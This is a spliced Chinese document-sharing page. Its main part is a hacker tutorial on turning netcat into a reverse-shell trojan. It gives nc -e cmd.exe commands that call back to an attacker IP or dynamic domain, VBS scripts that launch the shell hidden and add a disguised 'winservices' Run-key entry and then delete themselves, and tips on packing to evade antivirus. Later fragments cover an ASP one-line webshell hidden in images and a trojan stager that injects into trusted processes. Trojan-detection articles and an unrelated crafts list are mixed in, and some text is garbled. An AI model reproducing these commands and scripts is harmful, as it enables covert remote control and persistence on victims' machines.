利用NC来制作自己的反弹木马
免责申明:我也是第一次公开写这样的东西,不过写此文的目的是为了技术上的研究,把我自己的一些方法和技巧讲出来,和大家一起探讨,希望大家能提出意见.并不是教大家如何利用此方法去破坏别人的电脑!请不要用于非法目的,否则一切责任自负与我无关,呵呵~~~我可不想做黑鹰的大米呀.
一、必须掌握的基础知识;
NC这个工具对于一个黑客来说再熟悉不过了,可以说是每个黑客必备工具之一,被称做黑客的一把瑞士军刀!可见其地位之高.大家有兴趣的话自己去看一下有关NC的一些详细用法吧,我在这里就不多说了,这不是我这次要讲的主题,我只把其中我用到的一些参数介绍给大家.NC并不是一个图形界面的工具,但它有很强大的正向链接、反向链接、扫描和监听PORT等功能!
对于木马,它的种类也有很多,但最让人喜欢的还是具有反弹功能的木马,它可以让我们一劳永逸,一次种植成功以后便自动找上门来,呵呵~~~事半功倍呀!这也是我喜欢反向链接木马的一个原因。(对于正向链接我最喜欢的一个工具就是radmin,原因就是它不会被杀。)至于如何让别人中了你的木马、如何去入侵对方,然后给他种马我就不说了(这也不是我这次要说的主题)方法和手法有很多,就看你的技术了。当你成功入侵一台机子后,你想做的事当然是永远的抓住它,不要让他轻易的溜走,那就赶快上传你自己的木马吧!这是我的通常做法。这时一个优秀的木马会给我们很大帮助。
还是来说NC吧。它的使的格式是这样的,在CMD下输入:NC.EXE [参数1] [参数2] ……主机名(或IP)。
NC有很多的参数,它的功能就体现在这些参数上。这里有几个要用到的、必需掌握的参数给大家简略的介绍一下:
-l监听模式,可以监听本地的PORT即端口;
-p设置端口,后加端口号;
-v显示详细信息,
-vv显示更详细信息;
-t 以telnet交互方式来回应;
-e程序重定向,可以把目标机的CMD重定向到一个端口上,然后我们在本机进行监听,这样就可以得到目标机的SHELL了,具体看后面我讲的例子吧;
-d后台模式;主要的参数就这么多吧,我们通过下面的例子来一步一步学习吧!
二、简单的几个例子;
例如对本机TCP端口90的监听:nc.exe -l -v -p 90 127.0.0.1 意思是临听本机的TCP 端口90(如图1)。
(在这里如果是本机的话,可以省去主机名或IP,即不写127.0.0.1这时默认就是本机。还有默认情况下-p端口就指的是TCP如果要临听UDP端口,则要加-u参数!)我们来验证一下结果,看是不是真的监听我们本机的90端口,先不运行NC我们用netstat -an这个命令来查看一下本机的端口,结果(如图2)
没有发现TCP90端口被开放,我们运行nc.exe -l -v -p 90这样一个命令后,这时不要关闭这个监听窗口,再开一个CMD,然后再用nbtstat -an来查看本机所开放的端口,这时会发现TCP90端口被打开(如图3)
如果你有fport这个工具的话,你还可以进一步查看到是哪个程序打开了本机TCP90端口!(如图4)
(关于nbtstat和fport我就不做介绍了)。先来看一个正向链接的例子,当我们成功进入别人的机子并上传了NC后,可以用这样一个命令来实现正向链接,(假设目标机的IP为222.91.203.208)在目标机上运行nc 127.0.0.1 123 -e cmd.exe即把它的cmd定向到它自己的123端口上。那么我们在本机上就可以用nc -l -v 222.91.203.208 -p 123来监听它的123端口,从而得到对方的cmd。或者用这样简单的命令来把CMD定向到99端口:nc -l -p 99 -t -e cmd.exe 然后我们在本机上用telnet来链接目标机,同样可以得到对方的shell.比如目标机的IP为:192.168.199.1,那么我们用telnet 192.168.199.1 99来链接对方!(如图5).
以上就是两个正向链接的例子,其实也很简单,相信到此大家对nc应该有了一个大概的了解了吧?接下来我想重点说说它的反向链接功能。
三、反向链接的实现;
所谓反向链接,简单的说就是目标机主动来链接我们的机子,而不用我们主动去找他,这样我们就省事的多了,当目标机上线后会自动来链接我们设定的端口(这算是我个人的理解吧,我也没有一个准确的定义).我们下面一步步来解实现,一步步来解决其中出现的问题,最终实现我们的目的!
一个简单的例子,假设我们的IP为:219.144.20.42 那么在目标机上我们可以用这样的命令来实现反弹:nc -t -e cmd.exe 219.144.20.42 99(如图6).
它的意思就是,把cmd定向在219.144.20.42(我们机子)的99端口上,那么我们在本机上直接监听99端口,就可的到shell,nc -l -p 99(如图7)
(一点说明,就是以上操作应当先在本机监听,然后在目标机上执行重定向,这样才能实现反弹!).以上反弹的实现看起来很容易就能实现,但细想一下,在我们实际情况中并不是这样简单的,首先这样的反弹只是一次性的!因为对方和我们一般来说都是个人用户,都是动态的IP,重启后下次就不能用nc -t -e cmd.exe 219.144.20.42 99来和我们进行链接,因为我们的IP地址已经发生了变化!而且我们也不可能当我们的IP地址每变一次,我们就去入侵他一次,然后改变我们刚才的IP地址,这是不现实的.那么怎样来解决这一问题呢?怎样才能让它,当我们的IP 发生变化后仍然可以实现把它的shell反弹到我们的机子上来呢?
这是关键的一步,为此我也曾冥思苦想,好长时间没有想出一个解决的办法.也没有人告诉我该怎么做!不过我并没有因此而放弃,我用nc本身所带的参数并不能实现我所要的功能,于是我把思路转在了nc之外,很快我想到"域名转向"这个方法,即使用动态域名!呵呵~~我终于成功了,功夫不负有心人啊,真的是有感而发.我使用的是希网网络提供的免费动态域名,大家可以到https://www.doczj.com/doc/1f5745457.html,这个网上去注册一个!注册成功后会得到一个:用户名https://www.doczj.com/doc/1f5745457.html,的动态域名,然后下载客户端软件,便可实现了!(关于动态域名的一些知识以及如何申请、使用客户端我在这里就不讲了,我只能说这不是我要讲的主题,有兴趣的朋友可以自己去试一下,很简单的)。我申请的是https://www.doczj.com/doc/1f5745457.html,并在本机上安装客户端软件(如图8)。
这样我们就可以用以下命令来实现反弹:nc -t -e cmd.exe https://www.doczj.com/doc/1f5745457.html, 7788 -d我想大家一定能明白这行命令的意思吧?就是将本机的cmd重定向在https://www.doczj.com/doc/1f5745457.html,的7788端口上,这里的https://www.doczj.com/doc/1f5745457.html,就是我注册的动态域名转向了,因此无论我的IP如何变化都能够转到我的机子上来,只要在我的机子上监听7788端口便可以了,这样就实现了反弹的目的了,呵呵~~~现在想来其实也很简单的了,我基本什么也没有做!到此可以说理论上已经完成了,下一步就是怎样来完善了。
四、用VBS编程来实现
通过刚才的例子我们可以知道,只用nc -t -e cmd.exe https://www.doczj.com/doc/1f5745457.html, 7788 -d这样一句命令就可以实现反向链接了,那么如何让目标机一开机就把它的cmd定向到我的机子上来了呢?很多朋友会立刻想到用批处理来实现,这的确是一个不错的主意,用批处理最简单、最容易实现,对我们来说也是比较的熟悉。但是用批处理有一个弊端,就是当我们把以上命令存为一个批处理文件并运行这个批处理时,会有一个DOS窗口一闪而过,虽然来不及看是什么,但别人一看也就明白了,这样很容易就会被发现!那么如何来避免呢?我采取的是用VBS 来编程实现,使用它的好处就是它不会弹出DOS窗口,同样能够完成批处理的功能。(关于VBS的一些知识我不能在这里给大家介绍了,虽然我是只懂得一点点,但说起来恐怕真的三天也讲不明白个所以然,会影响了我要说的主题,也恐怕会引起一些人的不满,说我尽说些无关的话题,所以我写的程序我就不做详细解释了,如果看不懂的话可以照搬我程序,请大家原谅!)请将以下程序另存为nc.vbs然后和nc.exe一起存放在目标机的%systemroot%\system32下即可,然后我们在本机上监听7788端口,在目标机上运行nc.vbs 就能得到对方的shell。
nc.vbs程序内容如下:
dim wshell
set wshell=CreateObject("wscript.shell")
wshell.run "nc -t -e cmd.exe https://www.doczj.com/doc/1f5745457.html, 7788 -d",0,true 上面的程序其实就是执行了nc -t -e cmd.exe https://www.doczj.com/doc/1f5745457.html, 7788 –d
这样一条语句。当我们成功的把nc.vbs和nc.exe上传到目标机上后,下一步如何让它实现自动运行的方法就有很多了,我想大家也能想到一些办法的,还是看我的一个具体实例吧。前提是我已经通过其它方法成功进入了别人的一台机子,并用radmin建立了正向链接,而且也已经上传了nc.vbs和nc.exe这个不说了,看图吧(如图9)。
接下来我在我的机子上开始监听7788端口(如图10)。
我通过radmin的远程telnet功能在目标机上运行nc.vbs,然后就在我的机子上到得了对方的shell(如图11),
从图中大家也可以看得出,我的机子是2000系统而对方的是XP!既然我得到了对方的shell 那么我就可以想做什么做什么了,呵呵~~。进一步查看一下对方的机子吧,我查看了一下他机子的boot.ini发现这是一台xp Home Edition版的机子(如图12)。
我下步要做的就是把nc.vbs添加到目标机的autoexec.bat中,目的就是让它开机自动运行,来实现真正的反弹呀!呵呵`~~~。我通过echo命令结合>>来给
它添加(如图13)。
让它自动运行的方法有很多种,刚才我用的是修改autoexec.bat的方法来实现,我再讲一下添加注册表的方法吧,我同样用vbs来完成。我们知道如果在注册表中HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\这个位置添加键值,便会开机自动运行。所以我就用vbs程序来在以上位置添加nc.vbs,文件名为auto.vbs。为了更加的隐蔽,我又添加了能实现自我删除的功能,就是当运行完auto.vbs文件后它首先会将%systemroot%\system32\nc.vbs添加到注册表中Run下,然后就自我删除!为了实现能够自我删除,我也想了好长时间、好多办法最后终于成功了,可能我的方法不是很正规和科学,但因水平有限只能暂且这样了,呵呵~~~看程序吧,
将以下程序保存为auto.vbs。内容如下: Dim AutoR
Set AutoR=WScript.CreateObject("WScript.Shell")
RegPath="HKLM\Software\Microsoft\Windows\CurrentVersion\Run\"
Type_Name="REG_SZ" Key_Name="winservices"
Key_Data="%SystemRoot%\system32\nc.vbs"
AutoR.RegWrite RegPath&Key_Name,Key_Data,Type_Name
Dim delself
Set delself = WScript.CreateObject ("WSCript.shell")
delself.run "%COMSPEC% /c del auto.vbs",0,true
那么当我们把nc.exe和nc.vbs存放在目标机的%SystemRoot%\system32\下以后,就可以在目标机上直接运行auto.vbs(位置可以任意,但文件名必须与程序内的一至,否则不能完成自我删除!)。它会自动在注册表中新建一个名为winservices的键值,并将值设为%SystemRoot%\system32\nc.vbs这样就将nc.vbs添加到了注册表中(如图14)。
这样一来我们就比较的省事了,而且运行完auto.vbs文件后它就删除了自己,使我们的木马更加的隐蔽!
五、总结;
每次到此都要总结一下,这似乎成了习惯,总想再说几句。为了写这个教程我也花了很大的功夫,也花了很多的时间,我这一讲主要针对的是菜鸟入门级的朋友,所以在讲的过程中我尽力把一些需要掌握的东西讲清楚、讲详细希望大多数朋友都能够接受。当然在其中可能有一些象vbs、域名转向、nc的一些参数等等可能不容易理解,但我想只要你认真、仔细的去看我的每一步操作过程应当也不会觉得太难,所以希望大家多动手实践,有条件的可以一步步的试验一下,这样理解起来也容易些,说不定你也会有自己不同的方法和收获。感谢
阅读!
申明:nc.exe会被一般杀毒软件当做一个hacktools(黑客工具)而杀掉,如果你想不被杀的话,就请自己动手加壳或加花吧,我在这里就不说具体的过程了
(由于这是本人原创有描述或技术上的错误请指出!)————雏鹰
本文用到的工具
nc https://www.doczj.com/doc/1f5745457.html,/file/73430433
Radmin3.2影子版注册版https://www.doczj.com/doc/1f5745457.html,/file/73430469
其他一些远控实用工具:https://www.doczj.com/doc/1f5745457.html,/file/73430589
DLL木马的发现与清除 林廷劈 (三明学院数学与计算机科学系,福建三明 365004) 摘要:探讨了DLL木马的危害性,提出了如何发现这种木马的方法以及清除这种新型木马的措施。关键词:网络安全;DLL木马;发现;清除中图分类号:TP393.08 文献标识号:A 文章编号:1673-4343(2006)04-0439-04 TheDetectionandDeletionoftheDLLTrojanHorse LINTing-pi (DepartmentofMathematicsandComputerScience,SanmingUniversity,Sanming365004,China) Abstract:ThisarticlediscussestheharmoftheDLLBackdoor,pointsouthowtodetectthebackdoorandintroducessomemethodshowtoerasethisnewtypeofbackdoor. Keywords:DLLTrojanHorse;detection;deletion 引言 木马在如今的网络中,是十分普遍的存在,它的危害不言而喻。如果你家的电脑经常泄露秘密,一般都是木马的原因。随着人们对网络安全意识的提高,对木马认识的加强,传统的木马(一个或几个可执行程序)已经很难再隐藏自己,于是出现了一种新型的木马,它就是用DLL文件做成的木马。这种木马把自己做成一个DLL文件,然后再由某个EXE程序文件作为载体对它进行调用,或者使用RUNDLL32.EXE来启动,通过这样的技术处理,一方面不会有木马本身的进程出现,同时也实现了端口的隐藏。因此这种木马很难被察觉,也很难清除。本文针对DLL木马这一问题进行探讨,提出了DLL木马如何发现和清除的方法。 1木马侵入机器的途径和危害 木马大多十分隐蔽,在多数情况下,很多机器 都是在不知不觉中被种植了木马。根据笔者的研究发现,木马侵入机器的途径主要有: 隐藏在软件包中,一旦用户下载了一个带有木马的软件包,在机器运行安装程序时,木马就会种植在系统中;很多木马都是绑定在某个软件上的,传播木马的玩家很喜欢把木马放在FTP服务 器上(或者WEB服务器),然后他会在网络中找各种机会宣传服务器的地址让用户去访问,所以用户下载文件时一定要小心提防;隐藏在带附件的邮件中,这种邮件很多,一些垃圾邮件就经常是这种类型,一旦运行了附件中的文件,那么木马就在你的机器中"安营扎寨"了;当然这种方式的传播对用户来说已经不可怕了,因为很多用户都有一定的警惕性了,不轻易运行附件就可以了;通过即时通信工具进行传播,比如对方把木马和一张很有诱惑力的图片绑在一起,通过QQ发给你,一般情况下你都会打开这图片看看,看完之后你的电脑就中招了;通过不良网站传播,这种情况最难防范,只要你的机器访问对方的网站,就等于“引狼入室”。目前这种不良网站数量很多,可谓防不胜防。 木马一旦侵入你的系统,无异于用户的一切资料大门洞开,后患无穷,对此不能掉以轻心。很多木马最喜欢做的事情就是收集用户各种密码,还有的专门记录用户键盘输入的字符。许多用户认为自己安装了防火墙,也安装了杀毒软件,机器就安全了。但是道高一尺魔高一丈,随着木马开发者不断地进行技术改进,很多木马都能绕过防火墙的拦截,国内常用的瑞星、天网、毒霸等工具都算不错的防火墙软件,但是这些工具对于木马开 收稿日期:2006-08-13 作者简介:林廷劈(1973-),男,福建大田人,讲师。 2006年12月第23卷第4期 三明学院学报 JOURNALOFSANMINGUNIVERSITY Dec.2006Vol.23NO.4
木马程序是如何实现隐藏的 木马是一种基于远程控制的病毒程序,该程序具有很强的隐蔽性和危害性,它可以在人不知鬼不觉的状态下控制你或者监视你。有人说,既然木马这么厉害,那我离它远一点不就可以了!然而这个木马实在是“淘气”,它可不管你是否欢迎,只要它高兴,它就会想法设法地闯到你“家”中来的!哎呀,那还了得,赶快看看自己的电脑中有没有木马,说不定正在“家”中兴风作浪呢!那我怎么知道木马在哪里呢,相信不熟悉木马的菜鸟们肯定想知道这样的问题。下面就是木马潜伏的诡招,看了以后不要忘记采取绝招来对付这些损招哟! 1、集成到程序中 其实木马也是一个服务器-客户端程序,它为了不让用户能轻易地把它删除,就常常集成到程序里,一旦用户激活木马程序,那么木马文件和某一应用程序捆绑在一起,然后上传到服务端覆盖原文件,这样即使木马被删除了,只要运行捆绑了木马的应用程序,木马又会被安装上去了。绑定到某一应用程序中,如绑定到系统文件,那么每一次Windows启动均会启动木马。 2、隐藏在配置文件中 木马实在是太狡猾,知道菜鸟们平时使用的是图形化界面的操作系统,对于那些已经不太重要的配置文件大多数是不闻不问了,这正好给木马提供了一个藏身之处。而且利用配置文件的特殊作用,木马很容易就能在大家的计算机中运行、发作,从而偷窥或者监视大家。不过,现在这种方式不是很隐蔽,容易被发现,所以在Autoexec.bat和Config.sys中加载木马程序的并不多见,但也不能因此而掉以轻心哦。 3、潜伏在Win.ini中 木马要想达到控制或者监视计算机的目的,必须要运行,然而没有人会傻到自己在自己的计算机中运行这个该死的木马。当然,木马也早有心理准备,知道人类是高智商的动物,不会帮助它工作的,因此它必须找一个既安全又能在系统启动时自动运行的地方,于是潜伏在Win.ini中是木马感觉比较惬意的地方。大家不妨打开Win.ini来看看,在它的[windows]字段中有启动命令“load=”和“run=”,在一般情况下“=”后面是空白的,如果有后跟程序,比方说是这个样子:run=c:\windows\file.exe load=c:\windows\file.exe 这时你就要小心了,这个file.exe很可能是木马哦。 4、伪装在普通文件中 这个方法出现的比较晚,不过现在很流行,对于不熟练的windows操作者,很容易上当。具体方法是把可执行文件伪装成图片或文本----在程序中把图标改成Windows的默认图
启动C++Builder企业版,新建一个工程,添加三个VCL控件:一个是In ternet 页中的Server Socket,另两个是Fas tn et页中的NMFTP^ NMSMTPServer Socket 的功能是用来使本程序变成一个服务器程序,可以对外服务(对攻击者敞开大门)。Socket最初是在Unix上出现的,后来微软将它引入了Windows中(包括Win98和WinNt);后两个控件的作用是用来使程序具有FTP(File Transfer Protocol 文件传输协议)和SMTP(Simple Mail Transfer Protocol 简单邮件传输协议)功能,大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。 Form 窗体是可视的,这当然是不可思议的。不光占去了大量的空间(光一个Form 就有300K之大),而且使软件可见,根本没什么作用。因此实际写木马时可以用一些技巧使程序不包含Form,就像Delphi用过程实现的小程序一般只有17K左右那样。 我们首先应该让我们的程序能够隐身。双击Form,首先在FormCreate事件中添加可使木 马在Win9x 的“关闭程序”对话框中隐藏的代码。这看起来很神秘,其实说穿了不过是一种被称之为Service 的后台进程, 它可以运行在较高的优先级下, 可以说是非常靠近系统核心的设备驱动程序中的那一种。因此 , 只要将我们的程序在进程数据库中用RegisterServiceProcess ()函数注册成服务进程(Service Process )就可以了。不过该函数的声明在Borland 预先打包的头文件中没有,那么我们只好自己来声明这个位于中的鸟函数了。 首先判断目标机的操作系统是Win9x 还是WinNt: { DWORD dwVersion = GetVersion (); _str (), AnsiString (SystemPath+"\\\\" ).c_str (),FALSE ); .) { _str ()); _str ()); _str (); nsiLastChar ()!=\'\\\\\' ) _str (); _str (); uid ); ttributes = SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges (hToken, FALSE, &tkp , 0 ,(PTOKEN_PRIVILEGE)SNULL, 0); .) { goto NextTime; .) { return; 1 ” 2” 0L. Y ............ #define DestNum 1000 =random(ItemWidth);
“木马”的工作原理 由于很多新手对安全问题了解不多,所以并不知道自己的计算机中了“木马”该怎么样清除。虽然现在市面上有很多新版杀毒软件都可以自动清除“木马”,但它们并不能防范新出现的“木马”程序,因此最关键的还是要知道“木马”的工作原理,这样就会很容易发现“木马”。相信你看了这篇文章之后,就会成为一名查杀“木马”的高手了。 网络安全技术 木马查杀 网络安全知识 黑客软件 网络安全培训 黑客技术 “木马”程序会想尽一切办法隐藏自己,主要途径有:在任务栏中隐藏自己,这是最基本的只要把Form的Visible属性设为False、 ShowInTaskBar设为False,程序运行时就不会出现在任务栏中了。在任务管理器中隐形:将程序设为“系统服务”可以很轻松地伪装自己。当然它也会悄无声息地启动,你当然不会指望用户每次启动后点击“木马”图标来运行服务端,,“木马”会在每次用户启动时自动装载服务端,Windows系统启动时自动加载应用程序的方法,“木马”都会用上,如:启动组、win.ini、system.ini、注册表等等都是“木马”藏身的好地方。下面具体谈谈“木马”是怎样自动加载的。 网络安全|木马清除|电脑病毒|黑客技术|黑客软件电+脑*维+修-知.识_网(w_ww*dnw_xzs*co_m) DLL木马 要了解DLL木马,就必须知道这个“DLL”是什么意思,所以,让我们追溯到几年前,DOS系统大行其道的日子里。在那时候,写程序是一件繁琐的事情,因为每个程序的代码都是独立的,有时候为了实现一个功能,就要为此写很多代码,后来随着编程技术发展,程序员们把很多常用的代码集合(通用代码)放进一个独立的文件里,并把这个文件称为“库”(Library),在写程序的时候,把这个库文件加入编译器,………DLL木马就是把一个实现了木马功能的代码,加上一些特殊代码写成DLL文件,导出相关的API,在别人看来,这只是一个普通的DLL,但是这个DLL却携带了完整的木马功能,这就是DLL木马的概念。也许有人会问,既然同样的代码就可以实现木马功能,那么直接做程序就可以,为什么还要多此一举写成DLL呢?这是为了隐藏,因为DLL运行时是直接挂在调用它的程序的进程里的,并不会另外产生进程,所以相对于传统EXE木马来说,它很难被查到。电+脑*维+修-知.识_网 .网络安全|木马清除|电脑病毒|黑客技术|黑客软件(w_ww*dnw_xzs*co_m) 病毒名区别和标识病毒 很多时候大家已经用杀毒软件查出了自己的机子中了例如 Backdoor.RmtBomb.12 、Trojan.Win32.SendIP.15 等等这些一串英文还带数字的病毒名,这时有些人就懵了,那么长一串的名字,我怎么知道是什么病毒啊?
现在很多单位都采用单独的计算机来存放重要的涉密文件。然而如果涉密文件被盗,不仅会带来严重的经济损失,窃密者还可能逍遥法外。为了解决这个问题,我们需要对涉密文件采取某些措施:如绑定木马,在窃密者在得手后木马能自动执行,并记录下窃密者的相关信息,最后及时通知监控端。上面所采取的措施,我们称为网络跟踪技术。本文所要讲述的汇编木马,就经常应用在跟踪技术中。 举个例子:在一涉密.Doc文件中绑定一个.Exe木马。如果木马功能复杂,并且是在VC等编译环境下生成,那它的体积至少有几十K,再加上.Doc文件自身的数据量就非常可观了。一个大的.Doc文件会引起窃密者的怀疑,我们的跟踪也就达不到效果。因此,我们势必要设法在不影响最终目的的前提下,尽量减小木马文件的体积。办法可能不止一个,而我采用的是编写汇编木马的方式。当然,研究的平台都是在Windows2000以上的操作系统中。 Win32汇编木马设计思路 完整的汇编木马又称为“小马”,原因有两个:一是它体积小,只有几K;二是它的功能仅仅是反向连接攻击端,从攻击端下载并执行真正的功能复杂的木马(大马)。为了便于大家理解,本文将不关心“大马”的功能实现,重点是提出汇编木马的设计思路,并尽量从基础的角度进行讨论。 汇编木马的设计围绕4个重要的技术指标:体积小、防杀、突破防火墙与进程隐藏、拖动并执行“大马”, 下面逐一介绍: 1、体积小。常规木马大多用高级语言编写,在集成环境下编译生成。虽然
实现方便,但是生成的.Exe文件体积较大。对于汇编木马,我们采用Win32汇编来实现,使得.Exe文件体积控制在几K。 2、防杀。为了避免被诺顿、卡巴斯基、江民等主流杀毒软件所识别,木马文件一定要进行可靠的加壳处理。根据经验,一般我们选用最新的ASProtect,加壳后的.Exe文件生存能力一般比较强。如果需要,在必要的时候还可以手动修改文件特征码。 3、突破防火墙与进程隐藏。木马文件执行的时候需要与攻击端通信,必须访问网络。但不仅第三方的个人防火墙会阻拦你,现在Windows XP SP2也自带了软件防火墙。当“不可信任”的应用程序访问网络时,防火墙会报警。我的解决方法是:将网络通信部分的代码作为远程线程注入到防火墙“可信任”的进程中。这个“可信任”的进程一般是系统进程,也可以是IE。代码的注入,同时起到了进程隐藏的作用。 4、拖动并执行“大马”。这是汇编木马的核心功能,也是本文要重点举例讨论的内容。最终的监控、跟踪功能是在“大马”中实现的,它可以通过高级语言来实现,体积大小并没有什么限制。 Win32汇编基础 为了进行下面的讨论,Win32汇编是大家必须掌握的基础知识。Win32汇编生成的程序也是运行在Windows保护模式下的。我们可以通过下面几个方面去了解: 1、Win32ASM编译器 Win32ASM编译器最常用的有两种:Borland公司的Tasm5.0和Microsoft的Masm6.11及以上版本,两种编译器各有自己的优缺点,本文选用Microsoft
图片木马制作的三种方法Copy命令制作 1.asp内容: 打开cmd,数据一下命令:
此时打开两个jpg文件,相比: 且打开可以像一样显示图像。 把以下代码放入目标网站,即可按asp执行。<% #include files=””%> Uedit32(转载):
本制作来自于:雪糕。 我们通常在得到webshell之后都想给自己留个后门,等下次或以后有用得到的时候再进来看看。但如果直接加入一句话木马<%execute request("value")%>到asp文件中时,在该页面上就会有类似如下的错误: Microsoft VBScript 运行时错误错误 '800a000d' 类型不匹配: 'execute' /news1/,行 3 所以我们就可以开动脑筋了,使用插入一句话木马的图片做我们的后门。而且我们如果有足够的权限的话(希望网站中的文件可写),就直接把网站原有的图片变成后门,然后在那个asp文件中加入调用图片后门的代码: 这样就没有上面的“类型不匹配: 'execute'”错误了,而且也更好的隐藏了我们的后门。 新挑战始终会伴着新事物的出现而出现,当我们直接将我们的一句话木马的asp文件改成jpg或gif文件的时候,这个图片文件是打不开的,这又容易被管理员发现。然后我们就又开始思考并寻找新的方法:制作可以显示图片内容的图片格式后门。 制作步骤: 一、前期准备 材料: 1.一张图片:
2.一句话木马服务器端代码: <%execute request("value")%>(其他的一句话也行) 3.一句Script标签: 4. 调用图片后门代码: 工具:UltraEdit
常见木马病毒清除的方法 来源:互联网 | 2009年09月23日 | [字体:小大] | 网站首页 由于很多新手对安全问题了解不多,所以并不知道自己的计算机中了“木马”该怎么样清除。虽然现在市面上有很多新版杀毒软件都可以自动清除“木马”,但它们并不能防范新出现的“木马”程序,因此最关键的还是要知道“木马”的工作原理,这样就会很容易发现“木马”。相信你看了这篇文章之后,就会成为一名查杀“木马”的高手了。 “木马”程序会想尽一切办法隐藏自己,主要途径有:在任务栏中隐藏自己,这是最基本的只要把Form的Visible属性设为False、ShowInTaskBar设为False,程序运行时就不会出现在任务栏中了。在任务管理器中隐形:将程序设为“系统服务”可以很轻松地伪装自己。当然它也会悄无声息地启动,你当然不会指望用户每次启动后点击“木马”图标来运行服务端,,“木马”会在每次用户启动时自动装载服务端,Windows系统启动时自动加载应用程序的方法,“木马”都会用上,如:启动组、win.ini、system.ini、注册表等等都是“木马”藏身的好地方。下面具体谈谈“木马”是怎样自动加载的。 在win.ini文件中,在[WINDOWS]下面,“run=”和“load=”是可能加载“木马”程序的途径,必须仔细留心它们。一般情况下,它们的等号后面什么都没有,如果发现后面跟有路径与文件名不是你熟悉的启动文件,你的计算机就可能中上“木马”了。当然你也得看清楚,因为好多“木马”,如“AOL Trojan 木马”,它把自身伪装成command.exe文件,如果不注意可能不会发现它不是真正的系统启动文件。 在system.ini文件中,在[BOOT]下面有个“shell=文件名”。正确的文件名应该是“explorer.exe”,如果不是“explorer.exe”,而是“shell= explorer.exe 程序名”,那么后面跟着的那个程序就是“木马”程序,就是说你已经中“木马”了。 在注册表中的情况最复杂,通过regedit命令打开注册表编辑器,在点击至:“HKEY-LOCAL-MACHINESoftwareMicrosoftWindowsCurrentVersionRun”目录下,查看键值中有没有自己不熟悉的自动启动文件,扩展名为EXE,这里切记:有的“木马”程序生成的文件很像系统自身文件,想通过伪装蒙混过关,如“Acid Battery v1.0木马”,它将注册表 “HKEY-LOCAL-MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun”下的Explorer 键值改为Explorer=“C:WINDOWSexpiorer.exe”,“木马”程序与真正的Explorer之间只有“i”与“l”的差别。 当然在注册表中还有很多地方都可以隐藏“木马”程序, 如:“HKEY-CURRENT-USERSoftwareMicrosoftWindowsCurrentVersionRun”、“HKEY-USERS****SoftwareMicrosoftWindowsCurrentVersionRun”的目录下都有可能,最好的办法就是在
国外研究背景: 快速发展的计算机网络的普及,人类社会已经进入信息时代,信息已成为一种宝贵的人力资源。网络战争战场将成为未来信息作战风格。木马技术是一种两用网络攻击技术,使用木马技术渗透到敌人在系统内,建立一个稳定的内部点的攻击,并且提供了一个屏障。 1.有关国外的隐藏技术 (1)木马的P2P网络模型 木马设计的一个主要困难是隐藏的木马一定会各种各样的技术来隐藏行踪的目标系统植入后,为了避免被发现,尽可能延长生存。木马隐藏技术主要分为两类:主机隐藏和隐藏通信。设计一个新的木马主机隐藏DLL陷阱技术在Windows SPI接口,木马没有隐藏的过程。通信隐藏使用P2P技术控制网络模型取代了传统的木马,木马通信协议开发P2P环境中,提高隐藏的木马控制系统通信的性质,并确保系统的可靠性。 (2)Bootkit Bootkit是继承自Rootkit内核权限获取和自我痕迹擦除技术的Rootkit高级发展模式。大规模互联互通“之前每个人都连接到互联网”,恶意代码乘坐便携式存储介质,如光盘或软盘的恶意软件,通常病毒隐藏在引导扇区的磁盘,充当一个数字寄生虫,感染主机PC在引导过程的介绍。感染会腐败的机器通过改变硬盘的主引导记录,任何引导磁盘引导扇区代码,或磁盘分区表(DPT)。bootkit是启动病毒能够钩和补丁Windows加载到Windows内核,从而得到无限制的访问整个电脑,甚至可以绕过满卷加密,因为主引导记录不加密。主引导记录包含密码解密的软件要求和解密开车。 国内研究现状: 计算机病毒、特洛伊木马以及网络蠕虫等恶意程序对网络安全构成了巨大的威胁。其中特洛伊木马的破坏最大,它能在高隐蔽性的状态下窃取网民的隐私信息。通常被感染木马的计算机用户并不知道自己的计算机已被感染。这是由于木马程序具有很高的隐蔽性,它能在看似无任何异常的情况下,秘密操控远程主机,进行破坏活动。 1.木马隐藏相关技术 (1)程序隐蔽 木马程序隐藏通常指利用各种手段伪装木马程序,让一般用户无法从表面上直接识别出木马程序。要达到这一目的可以通过程序捆绑的方式实现。程序捆绑方式是将多个exe 程序链接在一起组合成一个exe 文件,当运行该exe 文件
16个生活中很实用的简单小制作个生活中很实用的简单小制作16
1、自制羽毛球准备材料:空饮料瓶一只,泡沫水果网套两只,橡皮筋一根,玻璃弹子一只。制作过程:1.取250毫升空饮料瓶一只,将瓶子的上半部分剪下;2.将剪下的部分均分为8份,用剪刀剪至瓶颈处,然后,将每一份剪成大小一致的花瓣形状;3.将泡
沫水果网套套在瓶身外,用橡皮筋固定在瓶口处;4.将另一只泡沫水果网套裹住一粒玻璃弹子,塞进瓶口,塞紧并露出1厘米左右; 5.剪下半只乒乓球,将半球底面覆在瓶口上,四边剪成须状,盖住瓶口后用橡皮筋固定住。 6.美化修饰后,一只自制羽毛球完成了。用、自制香2羽毛球拍打一打,看看效果怎么样? 皂纸制作材料和工具:吸湿性较好的白纸,小块香皂,一支毛笔和一次性饮料罐。制作方法:
先把香皂切碎后放在罐里,盛上适量的水后把杯子放在炉上加热,等香皂融化,将白纸裁成火柴盒大小,一张张涂透皂液,再取出阴干就成了香皂纸。3、自制热气球1.首先我们用软纸裁出6~8个叶状的纸片。2.将它们对折并用胶水将它们的边粘在一起作成一个气球。3.用胶带将四根连线粘到气球
底部。用橡皮泥将线的另外一端固定在桌子上。4.尽量将电吹风的速度调的很慢。将吹风口向上对准底部的开口并且打开开关。气球会慢慢变大拉紧细线并且离开桌面。4、自制手电筒具体制作方法是:将一只废易拉罐(如露露饮料罐)起掉一头盖子,另一头用圆头榔头敲凹。用厚瓦楞纸板卷起两节一号电池,电池正极朝 上、负极朝下装入罐中。找一个合适的塑料盖(如神奇大大卷的盒盖正好可以扣在露露饮料罐
上),在盒盖中央挖一个圆形小洞,洞的大小以使灯泡插紧为宜。将灯泡底座插入小洞。取一段寻线两端剥去线皮,一端绕在灯座上,另一端从塑料盖侧面扎一个小孔穿出。将塑料盖盖在易拉罐上。检查一下,灯泡、电池是不是紧密接触。到这里一次性手电筒就做好了。使用时,用大拇指把从侧壁穿出的导
